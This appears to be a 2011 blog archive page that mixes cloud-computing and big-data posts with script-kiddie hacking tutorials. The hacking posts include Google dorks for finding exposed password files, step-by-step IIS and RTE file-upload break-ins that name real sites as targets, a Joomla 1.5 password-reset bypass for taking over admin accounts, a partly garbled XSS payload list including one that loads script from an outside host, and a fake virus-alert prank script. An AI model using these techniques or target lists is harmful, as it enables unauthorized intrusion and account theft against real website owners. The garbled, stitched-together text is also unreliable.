Articles

Affichage des articles du novembre, 2011

Coming To A Place Near You: A Private Cloud Spiked With Big Data

Image
Netflix similarity map Yesterday, I moderated a couple of panels at the Big Data Cloud event . I have been a keynote speaker, panelist, moderator, and participant for many conferences in the last few years. It has always been a pleasure to see the cloud and big data becoming more and more mainstream. Here are my quick observations and insights from the event: Private cloud getting momentum: As a public cloud proponent I thought I would never have to write this. But lately I have seen more and more interest in private cloud; new start-ups, established cloud vendors, and large legacy vendors are designing private or hybrid cloud solutions. Vendors have recognized that prospects and customers have started to take cloud very seriously but they still have the same concerns what they had few years back: security, moving data to public cloud, and giving up control. I am not interested in the private/public debate (though I do love to mess with fellow clouderati on Twitter on this topic). My

Password Search Queries using Google Dork !!!

"admin account info" filetype:log ! Host=*.* intext :enc_UserPassword=* ext:pcf "# -FrontPage-" ext:pwd inurl: (service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd "AutoCreate=TRUE password =*" "http://*:*@www" domainname "index of/" "ws_ftp.ini" "parent directory" "liveice configuration file" ext:cfg -site: sourceforge.net "parent directory" +proftpdpasswd "powered by ducalendar" -site:duware.com "Powered by Duclassified" -site: duware.com "Powered by Duclassified" -site:duware.com "DUware All Rights reserved" "powered by duclassmate" - site:duware.com "Powered by Dudirectory" -site:duware.com "powered by dudownload" -site: duware.com "Powered By Elite Forum Version *.*" "Powered by Link Department" "sets mode: +k" "your password is" filetype:log &quo

How to Hack webisites using IIS Exploit !!!

Image
Hello friends today  i am posting very easy technique of web hacking using IIS Exploit. 1) Go to Start ==> My Network Places ==> Add a Network Place 2) Click om Next ==> Choose Another network Location.  3) Click on Next ==> Now type the Vulnerable Website address. After that Click on next. Click Next ==> Finish.. After that you can see it from My Network Places.. Here are some IIS Vulnerable Website.. http://disk.hzyhzhx.com http://disk.hzyhzhx.com/ http://ayatolahkhamenae.parniansis.com/ http://bahadori1.parniansis.com/ http://beheshti.parniansis.com/ http://beheshti1.parniansis.com/ http://bentolhoda1.parniansis.com/ http://bitaraf.parniansis.com/ http://derakhshan.parniansis.com/ http://derakhshan1.parniansis.com/ http://derakhshan2.parniansis.com/ http://derakhshan3.parniansis.com/ http://ebnesina.parniansis.com/ http://emamali.parniansis.com/ http://emkhaleghiyeyzd.parniansis.com/

How to Hack webisites using IIS Exploit !!!

Image
Hello friends today  i am posting very easy technique of web hacking using IIS Exploit. 1) Go to Start ==> My Network Places ==> Add a Network Place 2) Click om Next ==> Choose Another network Location.  3) Click on Next ==> Now type the Vulnerable Website address. After that Click on next.  Click Next ==> Finish. After  that you can see it in your my Network places... :-) Here are Some IIS Vulnerable Website..

XSS CHEAT LIST !!!!

Image
[url=javascript:alert('XSS');]click me[/url] ipt>alert('XSS'); ipt>       alert(\"XSS\") '); ?>          ascript:alert('XSS');\">    ascript:alert('XSS');\ [color=red' onmouseover="alert('xss')"]mouse over[/color]  "/>     window.alert("Bonjour !");       onload=alert('XSS')>    ">    '">> XSS                alert("XSS") '?>       " onfocus=alert(document.domain) "> <"       XSS    perl -e 'print \" alert(\"XSS\") \";' > out    perl -e 'print \" \";' > out       alert(1)            a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);    ='> "+src="http://yoursite.com/xss.js?69,69">    >    ">/XaDoS/>    ">/KinG-InFeT.NeT/>    src

GovCloud.com !! The New Hub for Government Cloud Computing

Image
It gives me great pleasure to announce the relaunch of GovCloud.com ! GovCloud is the “go to” place for everything related to federal cloud computing. Our mission is to help federal organizations learn about, try and securely adopt cloud computing technologies. In full alignment with The Federal Cloud Computing Strategy , the  Federal CIO’s 25-Point Federal IT Reform Plan and NIST’s Cloud Computing Technology Roadmap , this site will provide a community hub for information dissemination and GovCloud best practices. A great deal of personal thanks goes out to the GovCloud.com  member companies (in alphabetical order): Akamai Clear Government Solutions IBM NJVC Planet Technologies Symantec VirtualGlobal VirtuStream VMware XO Communications Site highlights include: GovCloud reference library Training and education information from the National Cloud Technologist Association and Cloud Best Practices Network Cloud assessment tools from Gravitant SaaSmaker Platform-as-a-Service Member compa

Backupify Names Top 10 Cloud Computing Experts to Follow on Twitter

Image
THANK YOU BACKUPIFY !!!! Thank you for the honor of being on your Top 10 List ! Backupify is the leading backup provider for cloud based data, offering an all-in-one archiving, search and restore service for the most popular online services including Google Apps, Facebook, Twitter and more. With one account you get centralized access to all of your information, stored securely, easily searchable, and ready for restoration or transfer at a moment's notice. Other honorees include: . 1. Adria Richards 2. Susan Cline 3. Steven Peltzman 4. Ben Kepes 5. David Linthicum 6. Krishnan Subramanian 7. Matt Rosoff 8. Loraine Lawson 9. Om Malik 10. Kevin L. Jackson bringing up the rear.  Visit the Backupify Blog to read more about these outstanding Twitter leaders !! ( Thank you. If you enjoyed this article , get free updates by email or RSS - KLJ )

HACK WebSites using RTE Web Vulnerability !!!!!

Image
Hello Friends , Here i am posting another method  to hack a website using RTE Vulnerability :-) Dork: " inurl:RTE_popup_file_atch.asp" Copy the Dork in the Google and you will get a link . Eg: http://www.site.com/RTE_popup_file_atch.asp  After that Click on Choose File ==> Upload. Once your have uploaded your File you can see the File URL in the Right Hand Side ...Just copy the URL and paste it after website name... I have one Website for you.. http://capcomputers.be/ http://capcomputers.be/RTE_popup_file_atch.asp Enjoy ;-)

Chat with Friends through Command Prompt !!!!

All you need is your friend's IP Address and your Command Prompt.  Open Notepad and write this code as it is.....! @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A  Now save this as " Messenger.Bat ". Open Command Prompt. Drag this file (.bat file) over to Command Prompt and press Enter. Now, type the IP Address of the computer you want to contact and press enter  Now all you need to do is type your message and press Enter.            Start Chatting.......:-)

Create Your Own Fake Warning Message Screen !!!!

Hello friends... Making your own fake warning message screen... Now its very easy... 1. open notepad... 2.Just copy & paste it: lol=msgbox("Warning computer has been infected by a virus ",20,"Virus Alert").. 3. save it as a extension .vbs Your fake warning message box ready to use.. Try it & Enjoy... U can change your message by editing "computer has been infected by a virus" & replace it with ur message which u want to show...

Hidden Facebook Smileys Emotions codes... Only 4 my Loving Frndzz...

Image
Hidden Smileys and Emoticons: Really happy emote:  :D or :-D Wink emote:  ;) or ;-) Happy eyes:  ^_^ Laughing eyes:  >:o Cat smile:  :3 Grumpy:  >:-( Sad:  :( or :-( Crying emoticon:  :’( Shocked emoticon:  :o or :-o Glasses emoticon:  8) or 8-) Cool shades:  8-| Rude:  :p or :-p WHAT?!:  O.o Dork emote:  -_- Duhhh emote:  :/ or :\ Devil emote:  3:) Angel emote:  O:) Kiss emote:  :-* or :* Love emote: <3 Pacman:  :v Robot:  :|] Putnam’s face:  :putnam: Penguin <(")

Early Signs Of Big Data Going Mainstream

Image
Today, Cloudera announced a new $40m funding round to scale their sales and marketing efforts and a partnership with NetApp where NetApp will resell Cloudera's Hadoop as part of their solution portfolio. These both announcements are critical to where the cloud and Big Data are headed. Big Data going mainstream: Hadoop and MapReduce are not only meant for Google, Yahoo, and fancy Silicon Valley start-ups. People have recognized that there's a wider market for Hadoop for consumer as well as enterprise software applications. As I have argued before Hadoop and Cloud is a match made in heaven. I blogged about Cloudera and the rising demand of data-centric massive parallel processing almost 2.5 years back, Obviously, we have come a long way. The latest Hadoop conference is completely sold out. It's good to see the early signs of Hadoop going mainstream. I am expecting to see similar success for companies such as Datastax (previously Riptano) which is a "Cloudera for Cass

How to Hack Joomla Using Token ByPass. !!!!

Image
Today I will Show you how to Bypass Joomla token  and find user name.  The vulnerability is reported in all 1.5.x versions prior to 1.5.6. Dork:index.php?option=com_user&view=reset&layout=confirm  Copy and paste this Dork in google and you will get the result. For Eg:http://site.com/index.php?option=com_user&view=reset&layout=confirm After getting this kind of page just put Qoute ( ' )  in the Submit button and then click on Submit. After that you will get the option to reset the Password. :-) Once you have reset the Passsword it will show you the login page . Now you have to find the Username . :-)  Now go to the URL and paste this dork  index.php?option=com_fireboard&Itemid=71&func=userlist  Eg: http://site.com/index.php?option=com_fireboard&Itemid=71&func=userlist Here you will get the Username for login. :-) Now you have get the Username and password for the login..Try It . :) Yeppee...You have access the Administrator Panel.. Note:Special than